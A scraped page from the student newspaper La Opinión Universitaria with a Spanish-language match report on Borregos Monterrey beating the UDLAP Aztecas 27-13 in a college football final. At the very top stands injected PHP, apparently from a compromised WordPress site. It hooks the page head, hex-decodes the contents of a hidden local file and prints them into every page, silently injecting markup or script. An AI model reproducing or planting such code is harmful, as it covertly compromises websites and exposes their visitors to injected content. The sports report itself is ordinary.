if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Aztecas se quedaron con el subcampeonato – La Opinión Universitaria La Opinión Universitaria
Menu

Aztecas se quedaron con el subcampeonato

 

*En la final cayeron 13-27 con los Borregos Monterrey

 

A base de coraje, carácter, ofensivas efectivas y una defensa implacable, Borregos Monterrey regresó a lo más alto de la cima del futbol americano estudiantil al vencer a los Aztecas de la UDLAP 27-13 en la final de la Conferencia Premier de la CONADEIP.

Ante un estadio a su máxima capacidad, Borregos demostraron su trascendencia y consiguieron su cuarto título de la década, para así consagrase como los mejores a nivel nacional.

El partido fue de mucha intensidad para los locales, quienes en todo momento recibieron el apoyo de su afición pintada de azul y blanco.

Así, el equipo del campus Monterrey volvió a la gloria y consiguió el primer título en su nueva casa, donde permanece invicto.

Temprano en el primer cuarto Borregos se adelantó gracias a una conexión de 31 yardas entre Sebastián Hernández y Alejandro Betancourt, ante la algarabía de los 10 mil espectadores.

Los Aztecas quisieron reaccionar, pero jugadas defensivas de Martín Maldonado, Luis Sansores y una intercepción de Rubén Cueva no permitieron daño alguno.

Un gol de campo de 29 yardas de Leo Guajardo puso el marcador 10-0 en los primeros 15 minutos del partido.

En el segundo cuarto la figura fue Fernando Mejía, quien corrió como un verdadero Borrego Salvaje y anotó en dos ocasiones con acarreos de 20 y 11 yardas, y aventajar a los locales por 24-0.

Los Aztecas reaccionaron con una corrida de Kevin Correa de 6 yardas, aunque fallaron la conversión y se quedaron con seis puntos.

Para la segunda mitad, un gol de campo de Guajardo de 22 yardas aumentó la ventaja de Borregos, y la defensiva se mostró nuevamente a la altura de una final.

En el último cuarto del partido Aztecas logró anotar con un pase de Diego Ruiz a Luis Gerardo Retana, para poner el marcador 27-13, lo que parecía una reacción de los visitantes.

Los poblanos quisieron arremeter, pero la defensa azul se mostró impenetrable y selló el resultado a favor.

En los minutos finales del partido los Borregos ya festejaban el campeonato, y a segundos de terminarse invadieron la cancha para festejar en grande.

 

 

 

 

  • Tweets recientes